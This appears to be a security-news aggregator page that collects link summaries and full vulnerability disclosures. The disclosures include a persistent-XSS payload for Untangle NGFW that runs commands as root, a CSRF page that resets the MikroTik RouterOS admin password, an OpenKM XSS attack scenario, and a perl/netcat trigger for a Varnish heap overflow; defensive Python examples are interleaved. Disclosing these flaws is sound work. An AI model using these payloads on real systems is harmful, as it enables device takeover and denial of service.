Channel: BOT24

CERT C Secure Coding Standard Wiki

The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.


more here...........https://www.securecoding.cert.org/confluence/display/c/CERT+C+Coding+Standard

Python Registry Parser (regparse)

I released a tool called, Python Registry Parser (or regparse for short), which is a plugin based Windows Registry parser written in Python.

The reason for writing regparse was three fold.
1) I don’t like the output that current registry parsers (Gui/non-Gui) provide.
2) I like RegRipper, but didn’t want to learn Perl.
3) I wanted to improve my Python skills.

more here.........https://sysforensics.org/2015/03/python-registry-parser.html

Android Malware Evaluating Tools

In order to accomplish a deep antimalwares' detection algorithms analysis, we developed two different tools, both coded in Java.

more here........https://github.com/faber03/AndroidMalwareEvaluatingTools

Contemplating Malware Immunization via Infection Markers

Some malware avoids infecting the system twice by looking for predefined markers. For instance, if a particular process, registry key or mutex object is present on the host, such malicious software will assume that another instance of itself is already active and terminate before causing further harm. We could decrease the likelihood of infection by preemptively creating markers known to be associated with malware.

more here.........https://zeltser.com/malware-immunization-infection-markers/

Multiple vulnerabilities in Untangle NGFW 9-11

Multiple issues have been discovered in the Untangle NGFW virtual
appliance. The vendor was unresponsive and uncooperative to the researcher.

- Persistent XSS leading to root
Authentication required. Confirmed in versions 9 and 11 (up to rev r39357).

Throughout the Untangle user interface there are editable data tables for various user configuration options. An example of this is in: Configuration > Networking > Port Forwards. This table can be edited by clicking add to create a new port forward rule, or directly edited by double-clicking on the table rows themselves.

The problem arises from malicious user input into some of the fields of these editable tables, which is not properly sanitised and allows for execution of user-supplied JavaScript code in the context of the user's browser. Because this configuration data is saved into the backend database, this allows for persistent XSS in each of the vulnerable fields/tables.

This XSS attack is particularly devastating because the attacker can run commands as root on the virtual appliance, allowing for total system takeover. The Untangle JSON-RPC API has access to functionality provided by the ExecManager class (https://gitorious.org/untangle/src/source/381ad9cb2d1d475bb43814b07bbb0df2d1ae7b58:uvm/api/com/untangle/uvm/ExecManager.java), which by default allows arbitrary commands to be run as root on the system.
A POC demonstrating the issue is below:

Insert the following into the srcdoc attribute of a user-controlled iframe in the Description field or another vulnerable field (the iframe can also be styled to hide it, etc.):

Test <iframe srcdoc='[insert code]'></iframe> (single quotes)

Insert:

<html>
<head>
        <script type="text/javascript" src="/ext4/ext-all-debug.js"></script>
        <script type="text/javascript" src="/jsonrpc/jsonrpc.js"></script>
        <script type="text/javascript" src="/script/i18n.js"></script>
        <script type="text/javascript" src="script/components.js"></script>
        <script type="text/javascript" src="script/main.js"></script>
</head>
<body onload="exec()">
<script type="text/javascript">
        function exec() {
                var rpc = {};
                rpc.jsonrpc = new JSONRpcClient("/webui/JSON-RPC");
                var serverUID = rpc.jsonrpc.UvmContext.getServerUID();
                alert(serverUID);
                rpc.execManager = rpc.jsonrpc.UvmContext.execManager();
                var cmd = "whoami > /tmp/who";
                var exit = rpc.execManager.execResult(cmd);
                alert("Command: " + cmd + " - Exit code: " + exit);
        }
</script>
</body>
</html>
- Information disclosure from Local Directory
Authentication required. Confirmed in versions 9 and 11, not fixed.

The Local Directory interface shows a list of users stored on the Untangle system. Unfortunately, passwords are not sufficiently protected to prevent information disclosure.

Each user in the local directory interface has an attribute, 'passwordBase64Hash', which is the base64-encoded string of the plaintext password. Because base64 is a reversible encoding scheme rather than a hash, the passwordBase64Hash attribute can be trivially decoded into the original plaintext string, revealing the password for each user.
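An added example (not Untangle's code) that shows why a base64 "hash" is reversible, an audit check that flags such fields, and the salted PBKDF2 record a directory should store instead; the user record and password below are constructed for the example.

```python
import base64
import hashlib
import hmac
import os
import string

# Constructed user record in the shape the advisory describes: the
# 'passwordBase64Hash' attribute is merely base64 of the plaintext password.
SAMPLE_USER = {"username": "alice",
               "passwordBase64Hash": base64.b64encode(b"S3cret!pass").decode()}


def recover_plaintext(password_base64_hash: str) -> str:
    """Base64 is an encoding, not a hash: decoding returns the original password."""
    return base64.b64decode(password_base64_hash).decode()


def is_reversible_credential(value: str) -> bool:
    """Audit check: flag a stored 'hash' whose base64 decoding is printable text.
    A real digest decodes to random bytes and practically never passes this test."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return decoded != "" and all(c in string.printable for c in decoded)


# What a directory should store instead: a salted, iterated PBKDF2-HMAC digest.
ITERATIONS = 200_000


def make_password_record(password: str) -> dict:
    """Build a storable record: algorithm, iteration count, random salt, digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"alg": "pbkdf2_sha256", "iter": ITERATIONS,
            "salt": base64.b64encode(salt).decode(),
            "hash": base64.b64encode(digest).decode()}


def verify_password(record: dict, candidate: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    salt = base64.b64decode(record["salt"])
    expected = base64.b64decode(record["hash"])
    actual = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, record["iter"])
    return hmac.compare_digest(expected, actual)
```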

CH


Authored by Hutton

How Malware Generates Mutex Names to Evade Detection

Malicious software sometimes uses mutex objects to avoid infecting the system more than once, as well as to coordinate communications among its multiple components on the host. Incident responders can look for known mutex names to spot the presence of malware on the system. To evade detection, some malware avoids using a hardcoded name for its mutex, as is the case with the specimen discussed in this note.

more here..........https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429

OpenKM Platform Remote Reflected Cross Site Scripting (PoC)

# Exploit Title: OpenKM Platform Remote Reflected Cross Site Scripting
# Google Dork: N/A
# Date: 18-11-2014
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.openkm.com/en
# Software Link: http://www.openkm.com/en/download-english.html
# Version: All versions < 6.4.19 (built 23338)
# Tested on: All OS
# CVE : N/A

Hi,

My name is Mohamed Abdelbaset Elnoby aka (@SymbianSyMoh), an Information
Security Evangelist from Egypt.

I want to report a major security vulnerability in the OpenKM Platform. Let's
first know what OpenKM is :: Open Knowledge Management

OpenKM is a Free/Libre document management system that provides a web
interface for managing arbitrary files. OpenKM includes a content
repository, Lucene indexing, and jBPM workflow. The OpenKM system was
developed using Java technology.
In 2005 two developers involved in open source technologies and expertise
with some commercial document management solutions (Sharepoint, Documentum,
Hummingbird, among others) like Excalibur search engine or Kofax OCR engine
decided to start an open source project based on high level technologies to
build a document management system that they decided to call OpenKM.
- Wikipedia

Ref: http://en.wikipedia.org/wiki/OpenKM

-Vulnerability: Remote Reflected/Stored Cross Site Scripting with no remote
interaction
-Severity: Very Critical
-Vulnerable Parameter(s)/Input(s): Tasks
-Info: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
-Impact: Remote Admin or Users Full Account Takeover with no interaction.

-Attack Scenario:
1. User#1 "Attacker": creates a task with a vulnerable name and assigns it
to another User/Admin, the "Targeted Victim".
2. User#2 "Victim": gets exploited by the vulnerable task made by the
Attacker "User#1", since the task notification automatically appears on
the assigned user's ("Victim") side; the notification popup also displays the
vulnerable task name, so the victim is exploited with no interaction.


-PS: This is the most critical attack you will see on the OpenKM platform
because it works remotely against users; with the same scenario
described in the report you can steal/execute JS in the Administrator's
session.
-PoC Video: http://youtu.be/3jBQFAAq23k

Thanks

--
Best Regards,

Mohamed Abdelbaset Elnoby
Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
LinkedIn: https://www.linkedin.com/in/symbiansymoh
Curriculum Vitae: http://goo.gl/cNrVpL
Facebook: https://fb.com/symbiansymoh
Twitter: https://twitter.com/symbiansymoh

BERserk

A Go implementation of the BERserk attack against Mozilla NSS ASN.1 parsing of PKCS#1 RSA signatures with e = 3. It comes complete with a certificate generation tool and works with CAs in the trust store.

more here........https://github.com/FiloSottile/BERserk

Chrome SOP Bypass with SVG (CVE-2014-3160)

This is a short writeup about my SOP (Same-Origin Policy) bypass with SVG images I've found in Chrome, so that other security researchers can benefit from it. I reported the Chrome vulnerability to Google's security team in 2014 and they did a very good job at fixing it in Chrome's M36 release. At around Q4 2014 the bug ticket (#380885) was opened to public, so that I'm allowed to publish this writeup (as soon as I find time to write)...

more here...........http://www.christian-schneider.net/ChromeSopBypassWithSvg.html

First version of working CanBusHacker - low budget Can Bus sniffer/injector work in progress

This is a project to make a real time CAN packet monitoring system using Arduino and CAN BUS shield hardware. This makes a very affordable and reliable CAN packet monitor and injector.


more here.......https://github.com/ohjeongwook/CanBusHacker

A Ghost Tale

Back in January, two other guys and I tested Ghost CMS, doing a Web Application PT and a code review.
I won't talk here about the whole test, but I'll focus on my findings, trying to explain what brought me to discover them.

more here...........https://bughardy.me/a-ghost-tale/

Exploits

Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.

more here.......https://github.com/XiphosResearch/exploits

MikroTik RouterOS Admin Password Change CSRF (PoC)

# Exploit Title: MikroTik RouterOS Admin Password Change CSRF
# Google Dork: N/A
# Date: 23-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.mikrotik.com
# Software Link: http://www.mikrotik.com/download
# Version: All versions < 5.0
# Tested on: All OS
# CVE : N/A

What is MikroTik RouterOS?!
MikroTik RouterOS is an operating system based on the Linux kernel, known
as the MikroTik RouterOS. Installed on the company's proprietary hardware
(RouterBOARD series), or on standard x86-based computers, it turns a
computer into a network router and implements various additional features,
such as firewalling, virtual private network (VPN) service and client,
bandwidth shaping and quality of service, wireless access point functions
and other commonly used features when interconnecting networks. The system
is also able to serve as a captive-portal-based hotspot system.
- Wikipedia


What is CSRF Attack?!
Cross-Site Request Forgery (CSRF) is an attack which forces an end user to
execute unwanted actions on a web application in which he/she is currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request. With a little help of social engineering (like sending a
link via email/chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to perform state
changing requests like transferring funds, changing their email address,
etc. If the victim is an administrative account, CSRF can compromise the
entire web application.
- OWASP


Affected Versions:
All MikroTik RouterOS versions before v5.0


PoC Code:
<html>
<body>
<title>MikroTik RouterOS < v4 Admin Password Change CSRF Vulnerability</title>
<h1><b>MikroTik RouterOS < v4 Admin Password Change CSRF Vulnerability by @SymbianSyMoh</b></h1><br>
<input type="submit" value="Do it" onclick="var btn=document.createElement('IFRAME');btn.src='http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok';btn.width='0';btn.height='0';btn.id='myIframe';document.body.appendChild(btn);alert('Pwned');"><br>
</body>
</html>


Video PoC:
http://youtu.be/FHrvHJeLjLA

--
Best Regards,

Mohamed Abdelbaset Elnoby
Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
LinkedIn: https://www.linkedin.com/in/symbiansymoh
Curriculum Vitae: http://goo.gl/cNrVpL
Facebook: https://fb.com/symbiansymoh
Twitter: https://twitter.com/symbiansymoh
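The request the PoC above forges is a GET to /cfg with process=password and the new password in the URL, carrying no proof that the admin's own page sent it. As an added example (not MikroTik's code and not from the report's author), the check below admits such a configuration change only when it is a POST from the site's own origin carrying a per-session token; SITE_ORIGIN, the request shape and the session id are assumptions for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed admin UI origin; the PoC targets a LAN address, so the value here is
# only an example, not a real deployment.
SITE_ORIGIN = "http://192.168.0.2"
# 'process' values that change configuration; only the one from the PoC is listed.
STATE_CHANGING = {"password"}
SERVER_KEY = secrets.token_bytes(32)   # per-process secret used to derive tokens


def csrf_token_for(session_id: str) -> str:
    """Derive a per-session token (HMAC of the session id), so nothing is stored."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(header_value: str, site_origin: str) -> bool:
    """Compare the scheme and host[:port] of an Origin/Referer header to the site's."""
    if not header_value:
        return False
    u = urlsplit(header_value)
    return f"{u.scheme}://{u.netloc}" == site_origin


def is_allowed(request: dict) -> bool:
    """Admit a /cfg request only if it cannot have been forged by another site.

    `request` is a constructed shape for this example: method, query (URL
    parameters), form (POST body), headers, session_id (from the session cookie).
    """
    params = {**request["query"], **request["form"]}
    if params.get("process") not in STATE_CHANGING:
        return True                       # read-only, e.g. page=status
    if request["method"] != "POST":
        return False                      # the PoC drives the change with a GET
    if "process" in request["query"]:
        return False                      # mutation parameters belong in the body
    hdrs = request["headers"]
    if not same_origin(hdrs.get("Origin") or hdrs.get("Referer", ""), SITE_ORIGIN):
        return False                      # cross-site (or header-less) source
    expected = csrf_token_for(request["session_id"]).encode()
    supplied = request["form"].get("csrf_token", "").encode()
    return hmac.compare_digest(expected, supplied)


# Constructed request in the shape the PoC's hidden iframe produces.
FORGED = {"method": "GET",
          "query": {"page": "status", "counter": "1000", "process": "password",
                    "password1": "Pwn3D2015", "password2": "Pwn3D2015", "button": "ok"},
          "form": {},
          "headers": {"Referer": "http://attacker.example/"},
          "session_id": "sess-123"}


def legitimate_request(session_id: str, new_password: str) -> dict:
    """The same change as submitted by the admin UI's own form."""
    return {"method": "POST", "query": {"page": "status"},
            "form": {"process": "password", "password1": new_password,
                     "password2": new_password, "button": "ok",
                     "csrf_token": csrf_token_for(session_id)},
            "headers": {"Origin": SITE_ORIGIN},
            "session_id": session_id}
```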


Varnish 4.0.3 heap-buffer-overflow while parsing backend server HTTP response

Varnish Cache is a web application accelerator also known as a caching HTTP reverse proxy. You install it in front of any server that speaks HTTP and configure it to cache the contents. Varnish Cache is really, really fast. It typically speeds up delivery with a factor of 300 - 1000x, depending on your architecture. (Source Page: https://www.varnish-cache.org/about)

The latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seems to have a problem with parsing HTTP responses from the
backend.
The following example response will trigger a heap buffer overflow :

-- cut --
perl -e 'print "HTTP/1.1 200 OK\r\nContent-Length: dupa" . "\n" x 15855 . "A" x 10000 . "\n" ' | nc -l 1098
-- cut --

assuming your config uses localhost:1098 as backend.


meh kernel: [2045151.042468] traps: varnishd[25794] general protection ip:42982c sp:7eff082db2d0 error:0 in varnishd[400000+ac000]

Original asan report :
--- cut ---
=================================================================
==12962==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900cb24200 at pc 0x7feffed5a87b bp 0x7fef7b213fa0
sp 0x7fef7b213760
WRITE of size 32029 at 0x62900cb24200 thread T596
    #0 0x7feffed5a87a (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e87a)
    #1 0x7feffff11849 in HTTP1_Read (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xe8849)
    #2 0x7feffff04727 in v1f_pull_straight (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xdb727)
    #3 0x7fefffee1a35 in vfp_call (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb8a35)
    #4 0x7fefffee210f in VFP_Suck (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb910f)
    #5 0x7fefffee2ee3 in VFP_Fetch_Body (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb9ee3)
    #6 0x7fefffed9f56 in vbf_stp_fetch (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb0f56)
    #7 0x7fefffedea60 in vbf_fetch_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb5a60)
    #8 0x7feffff2d06a in Pool_Work_Thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10406a)
    #9 0x7feffff7b040 in wrk_thread_real (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152040)
    #10 0x7feffff7b442 in WRK_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152442)
    #11 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #12 0x7feffd9fa00c in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xfb00c)

0x62900cb24200 is located 0 bytes to the right of 16384-byte region [0x62900cb20200,0x62900cb24200)
allocated by thread T596 here:
    #0 0x7feffed807df in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x547df)
    #1 0x7feffffbe5e1 in sma_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1955e1)
    #2 0x7feffffb04c9 in stv_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1874c9)
    #3 0x7feffffb0e7b in stv_alloc_obj (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x187e7b)
    #4 0x7feffffb39ee in STV_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x18a9ee)
    #5 0x7fefffee1696 in VFP_GetStorage (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb8696)
    #6 0x7fefffee2953 in VFP_Fetch_Body (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb9953)
    #7 0x7fefffed9f56 in vbf_stp_fetch (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb0f56)
    #8 0x7fefffedea60 in vbf_fetch_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb5a60)
    #9 0x7feffff2d06a in Pool_Work_Thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10406a)
    #10 0x7feffff7b040 in wrk_thread_real (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152040)
    #11 0x7feffff7b442 in WRK_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152442)
    #12 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T596 created by T16 here:
    #0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
    #1 0x7feffff2d18d in pool_breed (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10418d)
    #2 0x7feffff2dd3f in pool_herder (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x104d3f)
    #3 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T16 created by T6 here:
    #0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
    #1 0x7feffff2f043 in pool_mkpool (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x106043)
    #2 0x7feffff2f527 in pool_poolherder (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x106527)
    #3 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T6 created by T0 here:
    #0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
    #1 0x7feffff2f8e1 in Pool_Init (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1068e1)
    #2 0x7feffff1a4cb in child_main (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xf14cb)
    #3 0x7feffff91402 in mgt_launch_child (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x168402)
    #4 0x7feffff92e06 in mgt_reap_child (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x169e06)
    #5 0x7feffff90541 in child_listener (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x167541)
    #6 0x7feffeb09ce7 in vev_schedule_one (/home/meh/varnish-4.0.3-asan/lib/varnish/libvarnish.so+0x24ce7)
    #7 0x7feffeb084b8 in vev_schedule (/home/meh/varnish-4.0.3-asan/lib/varnish/libvarnish.so+0x234b8)
    #8 0x7feffff93ff6 in MGT_Run (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x16aff6)
    #9 0x7feffff9db1f in main (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x174b1f)
    #10 0x7feffd920ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0c528195c7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c528195c830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c528195c840:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c528195c890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

--- cut ---

Our understanding after previous reports is that the Varnish security model assumes full
trust of the backend, so this is not considered a security problem (though we consider it one).
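The trigger combines a Content-Length that is not a number with a body far larger than the storage region (the ASan report shows a 32029-byte write into a 16384-byte region). As an added example (not Varnish's code and not from the advisory's authors), a strict HTTP/1.1 response reader in Python that refuses that framing outright and bounds every body write by both the bytes still owed and the buffer's capacity; MAX_HEAD_BYTES is an assumed limit, BUFFER_SIZE mirrors the region size from the report, and TRIGGER is a constructed, shrunken copy of the trigger's shape.

```python
import io
import re
from typing import List, Optional, Tuple

# Constructed reproduction of the trigger's shape (sizes cut down from the
# report): a non-numeric Content-Length followed by a large, unframed body.
TRIGGER = (b"HTTP/1.1 200 OK\r\nContent-Length: dupa" + b"\n" * 200
           + b"A" * 1000 + b"\n")

DIGITS = re.compile(rb"^[0-9]+$")
MAX_HEAD_BYTES = 8192   # cap on the header section; an assumption for this example
BUFFER_SIZE = 16384     # the 16384-byte storage region named in the ASan report


class BadResponse(ValueError):
    """A response a strict HTTP/1.1 client should refuse rather than guess at."""


def split_head(raw: bytes) -> Tuple[bytes, bytes]:
    """Separate the header section from the body (CRLF or bare LF line ends)."""
    m = re.search(rb"\r?\n\r?\n", raw)
    if m is None:
        raise BadResponse("header section not terminated")
    if m.start() > MAX_HEAD_BYTES:
        raise BadResponse("header section too large")
    return raw[:m.start()], raw[m.end():]


def parse_headers(head: bytes) -> List[Tuple[bytes, bytes]]:
    """Status line plus 'name: value' lines; anything else is rejected."""
    lines = head.split(b"\n")
    if not lines[0].rstrip(b"\r").startswith(b"HTTP/1."):
        raise BadResponse("bad status line")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.rstrip(b"\r").partition(b":")
        if not sep or not name or name != name.strip():
            raise BadResponse("malformed header line: %r" % line)
        headers.append((name.lower(), value.strip()))
    return headers


def content_length(headers: List[Tuple[bytes, bytes]]) -> Optional[int]:
    """RFC 7230 3.3.2 handling: digits only, and duplicate copies must agree."""
    values = {v for k, v in headers if k == b"content-length"}
    if not values:
        return None
    if len(values) > 1:
        raise BadResponse("conflicting Content-Length values")
    value = values.pop()
    if not DIGITS.match(value):
        raise BadResponse("non-numeric Content-Length: %r" % value)
    return int(value)


def read_body(stream: io.BufferedIOBase, length: int, buf: bytearray) -> int:
    """Copy `length` body bytes through a fixed buffer. Each write is bounded by
    both the bytes still owed and the buffer capacity, so the buffer cannot be
    overrun regardless of the declared or actual body size."""
    view, remaining, total = memoryview(buf), length, 0
    while remaining > 0:
        n = stream.readinto(view[:min(remaining, len(buf))])
        if not n:
            raise BadResponse("backend closed before the declared body arrived")
        total, remaining = total + n, remaining - n
    return total


def fetch(raw: bytes) -> int:
    """Parse a complete backend response and return the body size consumed."""
    head, body = split_head(raw)
    length = content_length(parse_headers(head))
    if length is None:
        raise BadResponse("no Content-Length; this example handles framed bodies only")
    return read_body(io.BytesIO(body), length, bytearray(BUFFER_SIZE))


def is_rejected(raw: bytes) -> bool:
    """True if the strict parser refuses the response (handy for audits/tests)."""
    try:
        fetch(raw)
    except BadResponse:
        return True
    return False
```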

Authored by
Filip Palian
Akat1
Marek Kroemeke

Exploiting the Cloud and Mitigating the Risk of SaaS Supplier Failure

The cloud is here to stay and according to a recent survey [i], organisations are going to be investing more in cloud services to support their core business operations.

But have companies properly considered the risks of SaaS supplier failure if the software is supporting their core processes?

The Kemp Little Consulting (KLC) team has been working with NCC Group to identify some of the risks of SaaS supplier failure and to identify the main problems that end user organisations would need to solve to effectively mitigate these risks.

more here......https://www.nccgroup.com/en/blog/2015/03/exploiting-the-cloud-and-mitigating-the-risk-of-saas-supplier-failure/

Paper: Tighter, faster, simpler side-channel security evaluations beyond computing power

Abstract. A Eurocrypt 2013 paper “Security evaluations beyond computing power: How to analyze side-channel attacks you cannot mount?” by Veyrat-Charvillon, Gérard, and Standaert proposed a “Rank Estimation Algorithm” (REA) to estimate the difficulty of finding a secret key given side-channel information from independent subkeys, such as the 16 key bytes in AES-128 or the 32 key bytes in AES-256. The lower and upper bounds produced by the algorithm are far apart for most key ranks. The algorithm can produce tighter bounds but then becomes exponentially slower; it also becomes exponentially slower as the number of subkeys increases.

This paper introduces two better algorithms for the same problem. The first, the “Extended Rank Estimation Algorithm” (EREA), is an extension of REA using statistical sampling as a second step to increase the speed of tightening the bounds on the rank. The second, the “Polynomial Rank Outlining Algorithm” (PRO), is a new approach to computing the rank. PRO can handle a much larger number of subkeys efficiently, is easy to implement in a computer-algebra system such as Sage, and produces much tighter bounds than REA in less time.

more here........http://sidechannels.cr.yp.to/pro/pro-20150308.pdf

Hacking Team Reloaded? US-Based Ethiopian Journalists Again Targeted with Spyware

Summary

On February 12, 2014, Citizen Lab published a report [1] documenting how journalists at the Ethiopian Satellite Television Service (ESAT) were targeted by a governmental attacker in December 2013, with what appeared to be Hacking Team’s Remote Control System (RCS) spyware.
This report details the events of November 5 and 10 and December 19, 2014, when the same attacker again targeted ESAT journalists based in the United States with what appear to be two updated versions of Hacking Team’s RCS spyware.
We link the governmental attacker to Ethiopia. The attacker may be the Ethiopian Information Network Security Agency (INSA). [2]
Hacking Team has a customer policy concerning the human rights implications of its products, [3] and claims it investigates and may take action in response to reported cases of abuse. [4] The research findings documented in this report suggest that Hacking Team may have continued to provide updated versions of its spyware to the same attacker, despite reports of use of the spyware against journalists.

more here.........https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

iOS Tutorial – Dumping the Application Memory Part 2

In my previous blog, iOS Tutorial – Dumping the Application Heap from Memory, I covered how to dump sensitive information from the heap of an iOS application using GDB. This time we will be covering how to use Cycript to accomplish the same goal but using the class-dump-z output to specifically pull out properties or instance variables. This round will be in a more automated fashion by automatically parsing a class dump of the binary and generating the necessary Cycript scripts to pull the specific properties from memory. I will also be releasing another tool to do all of this for you in the near future. Keep an eye on our NetSPI GitHub repo for the latest tools and scripts for when we release it.

more here...........https://blog.netspi.com/ios-tutorial-dumping-the-application-memory-part-2/

0 Detection PDF with external link to malware EXE

This morning Malware Domain List tweeted a 0/57 detection malware PDF which was/is not detected as malware by any AV product on VirusTotal.com

more here.........http://blog.malwaretracker.com/2015/03/0-detection-pdf-with-external-link-to.html

Paper: Enpublic Apps: Security Threats Using iOS Enterprise and Developer Certificates

ABSTRACT
Compared with Android, the conventional wisdom is that iOS is more secure. However, both jailbroken and non-jailbroken iOS devices have a number of vulnerabilities. For iOS, apps need to interact with the underlying system using Application Programming Interfaces (APIs). Some of these APIs remain undocumented and Apple forbids apps in the App Store from using them. These APIs, also known as “private APIs”, provide powerful features to developers and yet they may have serious security consequences if misused. Furthermore, apps which use private APIs can bypass the App Store and use “Apple’s Enterprise/Developer Certificates” for distribution. This poses a significant threat to the iOS ecosystem. So far, there is no formal study to understand these apps and how private APIs are being encapsulated. We call these iOS apps which are distributed to the public using enterprise certificates “enpublic” apps. In this paper, we present the design and implementation of iAnalytics, which can automatically analyze “enpublic” apps’ private API usages and vulnerabilities. Using iAnalytics, we crawled and analyzed 1,408 enpublic iOS apps. We discovered that: 844 (60%) out of the 1408 apps do use private APIs, 14 (1%) apps contain URL scheme vulnerabilities, and 901 (64%) enpublic apps transport sensitive information through unencrypted channels or store the information in plaintext on the phone. In addition, we summarized 25 private APIs which are crucial and security sensitive on iOS 6/7/8, and we have filed one CVE (Common Vulnerabilities and Exposures) for iOS devices.

more here..........http://www.cs.cuhk.hk/~cslui/PUBLICATION/ASIACCS15.pdf